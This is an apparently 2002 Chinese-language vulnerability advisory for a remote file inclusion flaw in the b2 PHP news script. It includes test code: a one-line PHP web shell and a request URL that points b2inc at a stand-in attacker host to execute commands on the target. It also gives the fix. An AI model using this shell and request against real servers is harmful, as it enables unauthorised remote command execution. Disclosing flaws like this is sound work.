b2 php存在远程命令可执行漏洞发布时间:2002-05-07 更新时间:2002-05-07 严重程度:高 威胁程度:远程管理员权限 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 b2 0.6pre2和之前版本详细描述 B2是允许管理员快速在FRONTPAGE刊登新闻的PHP脚本。问题存在于b2-include/b2edit.showposts.php: *snippet* <?php include_once ("b2config.php"); include_once ($b2inc."/b2functions.php"); *snippet* 由于b2config.php不存在于b2-include目录中,攻击者可以定义$b2inc在自己控制的机器上,使用文件包含导致任意命令在目标系统中执行。 测试代码 在自己机器上建立b2functions.php包含如下代码: <? system($cmd); ?> 在执行如下命令: http://www.vulnerablehost.com/b2/b2- include/b2edit.showposts.php?b2inc=http://www.attacker.com&c md=ls 解决方案 拷贝b2config.php到b2-include目录中。 相关信息 Frank (thran60@hotmail.com) 参考:http://archives.neohapsis.com/archives/bugtraq/2002-05/0027.html |
